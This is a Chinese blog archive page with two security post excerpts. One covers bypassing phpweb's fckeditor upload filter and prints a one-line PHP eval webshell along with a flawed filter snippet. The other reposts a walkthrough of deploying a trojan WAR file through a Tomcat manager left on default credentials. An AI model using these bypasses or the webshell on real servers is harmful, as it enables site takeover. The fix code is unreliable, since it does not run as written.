Category Archives: 糊涂虫

php漏洞 防止phpweb挂马

首先介绍个检查木马的工具  网络安全狗,可以检测一句话木马:  黑客会上传shell.php;.jpg 类似这种文件,新版的fckeditor会进行把.变成_  可是phpweb自带的fckeditor压根就没有这个功能。  不过有的话 黑客也会绕过。绕过的方法    提交shell.php+空格绕过 不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。  继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。     此文件里面的内容是: <?php eval($_POST[sb])?>  一句话木马   解决方法 。文件名进行过滤 只要文件里面含有。php 提示    //检查扩展名  if (in_array($file_ext, $ext_arr) === false||strpos($_POST['fileName'],”php”)) {   alert(“上传文件扩展名是不允许的扩展名。”);  } from 糊涂虫 http://www.hutud.com/archives/415 … Continue reading

Tomcat 默认名称无密码攻击全过程 通过tomcat获取sheel

转载地址:http://susam.iteye.com/blog/613431 有些 Tomcat 安装之后没有修改默认密码(用户名 admin ,密码为空)或者密码太过简单,这样别人就可以轻易登录进去。   A 登录 Tomcat 管理界面 。         大意的管理员们, 你看吧, 别人轻易就进了 Tomcat 的管理界面。     好戏马上要上场!!!!   B .发布你的木马到 Server 上 1. 找到 Deploy 项     制作或者上传一个 WAR 文件, 发布你为所欲为的程序吧, 如果没有, … Continue reading